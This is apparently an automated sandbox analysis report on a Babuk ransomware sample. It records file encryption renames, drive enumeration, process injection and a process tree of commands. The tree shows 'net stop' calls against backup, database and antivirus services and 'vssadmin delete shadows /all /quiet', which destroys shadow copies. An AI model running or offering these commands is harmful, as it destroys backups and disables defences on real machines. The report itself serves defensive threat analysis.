Malware Analysis Report

2024-10-16 03:24

Sample ID 210420-vvh2sqr4dx
Target ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe
SHA256 ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76
Tags
babuk ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76

Threat Level: Known bad

The file ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe was found to be: Known bad.

Malicious Activity Summary

babuk ransomware

Babuk Locker

Deletes shadow copies

Modifies extensions of user files

Enumerates connected drives

Enumerates physical storage devices

Interacts with shadow copies

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-04-20 13:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-04-20 13:37

Reported

2021-04-20 13:39

Platform

win7v20210410

Max time kernel

7s

Max time network

10s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\NewFind.raw => C:\Users\Admin\Pictures\NewFind.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\NewFind.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\RedoImport.crw => C:\Users\Admin\Pictures\RedoImport.crw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\RedoImport.crw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\RenameLimit.tif => C:\Users\Admin\Pictures\RenameLimit.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\RenameLimit.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 768 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1176 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 1176 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1176 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1176 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1984 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 1848 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 1792 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1768 wrote to memory of 1808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1768 wrote to memory of 1808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1768 wrote to memory of 1808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 1756 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1756 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1756 wrote to memory of 1384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1384 wrote to memory of 1240 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1384 wrote to memory of 1240 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1384 wrote to memory of 1240 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 848 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 848 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 848 wrote to memory of 1552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1552 wrote to memory of 1436 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1552 wrote to memory of 1436 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1552 wrote to memory of 1436 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1284 wrote to memory of 1584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1284 wrote to memory of 1584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1584 wrote to memory of 300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1584 wrote to memory of 300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1584 wrote to memory of 300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 292 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 292 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 292 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 292 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 112 wrote to memory of 332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 112 wrote to memory of 332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 112 wrote to memory of 332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 768 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe
PID 768 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe

"C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe"

C:\Windows\system32\cmd.exe

cmd.exe /c net stop mssqlserver /y

C:\Windows\system32\net.exe

net stop mssqlserver /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mssqlserver /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop vss /y

C:\Windows\system32\net.exe

net stop vss /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop vss /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop sql /y

C:\Windows\system32\net.exe

net stop sql /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sql /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop svc$ /y

C:\Windows\system32\net.exe

net stop svc$ /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop svc$ /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop memtas /y

C:\Windows\system32\net.exe

net stop memtas /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop memtas /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop mepocs /y

C:\Windows\system32\net.exe

net stop mepocs /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mepocs /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop sophos /y

C:\Windows\system32\net.exe

net stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop veeam /y

C:\Windows\system32\net.exe

net stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop backup /y

C:\Windows\system32\net.exe

net stop backup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop backup /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxVss /y

C:\Windows\system32\net.exe

net stop GxVss /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxVss /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxBlr /y

C:\Windows\system32\net.exe

net stop GxBlr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxBlr /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxFWD /y

C:\Windows\system32\net.exe

net stop GxFWD /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxFWD /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxCVD /y

C:\Windows\system32\net.exe

net stop GxCVD /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxCVD /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GxCIMgr /y

C:\Windows\system32\net.exe

net stop GxCIMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxCIMgr /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop DefWatch /y

C:\Windows\system32\net.exe

net stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop ccEvtMgr /y

C:\Windows\system32\net.exe

net stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop ccSetMgr /y

C:\Windows\system32\net.exe

net stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop SavRoam /y

C:\Windows\system32\net.exe

net stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop RTVscan /y

C:\Windows\system32\net.exe

net stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop QBFCService /y

C:\Windows\system32\net.exe

net stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop QBIDPService /y

C:\Windows\system32\net.exe

net stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net.exe

net stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop QBCFMonitorService /y

C:\Windows\system32\net.exe

net stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop YooBackup /y

C:\Windows\system32\net.exe

net stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop YooIT /y

C:\Windows\system32\net.exe

net stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop zhudongfangyu /y

C:\Windows\system32\net.exe

net stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop sophos /y

C:\Windows\system32\net.exe

net stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\system32\net.exe

net stop stc_raw_agent /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop VSNAPVSS /y

C:\Windows\system32\net.exe

net stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\system32\net.exe

net stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\system32\net.exe

net stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\system32\net.exe

net stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop veeam /y

C:\Windows\system32\net.exe

net stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\system32\net.exe

net stop PDVFSService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\system32\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\system32\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\system32\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecDiveciMediaService /y

C:\Windows\system32\net.exe

net stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\system32\net.exe

net stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\system32\net.exe

net stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\system32\net.exe

net stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\system32\net.exe

net stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\system32\net.exe

net stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop CASAD2DWebSvc /y

C:\Windows\system32\net.exe

net stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop CAARCUpdateSvc /y

C:\Windows\system32\net.exe

net stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\system32\cmd.exe

cmd.exe /c net stop GoogleChromeElevationService /y

C:\Windows\system32\net.exe

net stop GoogleChromeElevationService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GoogleChromeElevationService /y

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

memory/768-60-0x0000000075EF1000-0x0000000075EF3000-memory.dmp

memory/1176-61-0x0000000000000000-mapping.dmp

memory/1984-62-0x0000000000000000-mapping.dmp

memory/1848-63-0x0000000000000000-mapping.dmp

memory/1792-64-0x0000000000000000-mapping.dmp

memory/1768-65-0x0000000000000000-mapping.dmp

memory/1808-66-0x0000000000000000-mapping.dmp

memory/1756-67-0x0000000000000000-mapping.dmp

memory/1384-68-0x0000000000000000-mapping.dmp

memory/1240-69-0x0000000000000000-mapping.dmp

memory/848-70-0x0000000000000000-mapping.dmp

memory/1552-71-0x0000000000000000-mapping.dmp

memory/1436-72-0x0000000000000000-mapping.dmp

memory/1284-73-0x0000000000000000-mapping.dmp

memory/1584-74-0x0000000000000000-mapping.dmp

memory/300-75-0x0000000000000000-mapping.dmp

memory/292-76-0x0000000000000000-mapping.dmp

memory/112-77-0x0000000000000000-mapping.dmp

memory/332-78-0x0000000000000000-mapping.dmp

memory/1500-79-0x0000000000000000-mapping.dmp

memory/340-80-0x0000000000000000-mapping.dmp

memory/1184-81-0x0000000000000000-mapping.dmp

memory/1532-82-0x0000000000000000-mapping.dmp

memory/1648-83-0x0000000000000000-mapping.dmp

memory/324-84-0x0000000000000000-mapping.dmp

memory/1516-85-0x0000000000000000-mapping.dmp

memory/1496-86-0x0000000000000000-mapping.dmp

memory/860-87-0x0000000000000000-mapping.dmp

memory/608-88-0x0000000000000000-mapping.dmp

memory/1112-89-0x0000000000000000-mapping.dmp

memory/1568-90-0x0000000000000000-mapping.dmp

memory/1944-91-0x0000000000000000-mapping.dmp

memory/1720-92-0x0000000000000000-mapping.dmp

memory/1668-93-0x0000000000000000-mapping.dmp

memory/1760-94-0x0000000000000000-mapping.dmp

memory/1912-95-0x0000000000000000-mapping.dmp

memory/1848-96-0x0000000000000000-mapping.dmp

memory/2000-97-0x0000000000000000-mapping.dmp

memory/1800-98-0x0000000000000000-mapping.dmp

memory/1808-99-0x0000000000000000-mapping.dmp

memory/1764-100-0x0000000000000000-mapping.dmp

memory/1156-101-0x0000000000000000-mapping.dmp

memory/1384-102-0x0000000000000000-mapping.dmp

memory/1552-103-0x0000000000000000-mapping.dmp

memory/1284-104-0x0000000000000000-mapping.dmp

memory/832-105-0x0000000000000000-mapping.dmp

memory/112-106-0x0000000000000000-mapping.dmp

memory/1072-107-0x0000000000000000-mapping.dmp

memory/612-108-0x0000000000000000-mapping.dmp

memory/928-109-0x0000000000000000-mapping.dmp

memory/1064-110-0x0000000000000000-mapping.dmp

memory/912-111-0x0000000000000000-mapping.dmp

memory/996-112-0x0000000000000000-mapping.dmp

memory/1424-113-0x0000000000000000-mapping.dmp

memory/1972-114-0x0000000000000000-mapping.dmp

memory/608-115-0x0000000000000000-mapping.dmp

